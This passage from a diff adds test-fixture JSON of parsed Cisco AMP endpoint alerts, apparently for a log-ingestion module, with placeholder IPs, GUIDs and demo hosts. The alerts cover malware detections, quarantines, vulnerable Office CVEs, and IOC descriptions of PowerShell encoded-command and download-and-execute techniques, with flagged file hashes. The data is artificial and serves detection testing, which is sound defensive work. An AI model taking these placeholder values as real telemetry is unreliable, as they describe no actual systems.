"process.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "related.hash": [ + "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T07:56:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": 
"test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 758406329, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 30050, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T05:49:06.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 403000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136035192884000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T05:49:06.000Z", + "file.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "file.name": "powershell.exe", + "file.path": "file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 31276, + "process.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "related.hash": [ + "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:37:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": 
"38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1515350231459808800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 33023, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:27:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 579890366, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": 
"5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34132, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:02:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 614000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583671182384431000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 35358, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517762", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 695000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 36288, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517761", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 691000000, + 
"event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 37489, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.0B965CA8AF-95.SBX.TG", + "cisco.amp.detection_id": "6411132837046517762", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 684000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "11179468.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + 
"host.os.platform": "windows", + "input.type": "log", + "log.offset": 38602, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.0B965CA8AF-95.SBX.TG", + "cisco.amp.detection_id": "6411132837046517761", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 682000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "84b6f7be5370c1998886214790c6892b", + "file.hash.sha1": "5faebef3bb880489195e80e6656ccf442ff7123b", + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 39856, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "84b6f7be5370c1998886214790c6892b", + "5faebef3bb880489195e80e6656ccf442ff7123b" + ], + 
"related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:37:33.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2014-0260", + "CVE-2014-1761", + "CVE-2014-6357", + "CVE-2015-0085", + "CVE-2015-0086", + "CVE-2015-1641", + "CVE-2015-1650", + "CVE-2015-1682", + "CVE-2015-2379", + "CVE-2015-2380", + "CVE-2015-2424", + "CVE-2016-0127", + "CVE-2016-7193", + "CVE-2017-0292", + "CVE-2017-11826" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2014-0260", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260", + "version": "2013" + }, + { + "cve": "CVE-2014-1761", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761" + }, + { + "cve": "CVE-2014-6357", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357" + }, + { + "cve": "CVE-2015-0085", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085" + }, + { + "cve": "CVE-2015-0086", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086" + }, + { + "cve": "CVE-2015-1641", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641" + }, + { + "cve": 
"CVE-2015-1650", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650" + }, + { + "cve": "CVE-2015-1682", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682" + }, + { + "cve": "CVE-2015-2379", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379" + }, + { + "cve": "CVE-2015-2380", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380" + }, + { + "cve": "CVE-2015-2424", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424" + }, + { + "cve": "CVE-2016-0127", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127" + }, + { + "cve": "CVE-2016-7193", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193" + }, + { + "cve": "CVE-2017-0292", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292" + }, + { + "cve": "CVE-2017-11826", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15152998206589, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-13T10:37:33.000Z", + "file.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "file.name": "WINWORD.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 41214, + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "related.hash": [ + "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + 
"forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:23:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 349000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6508159571352093000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 44193, + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:13.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 312509000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298360312529000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-13T10:13:13.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 45111, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:08.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 162019000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298355162029000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-13T10:13:08.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 46862, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:00:07.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6508153524038139905", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 606000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508153524038140000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 48509, + "related.hash": [ + "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:24:47.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 693632000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521062325693667300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-12T10:24:47.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 49613, + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:15:22.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6532910514396201000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 51389, + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Malwaregen.21do.1201", + "cisco.amp.detection_id": "6525520937264087041", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 661000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + 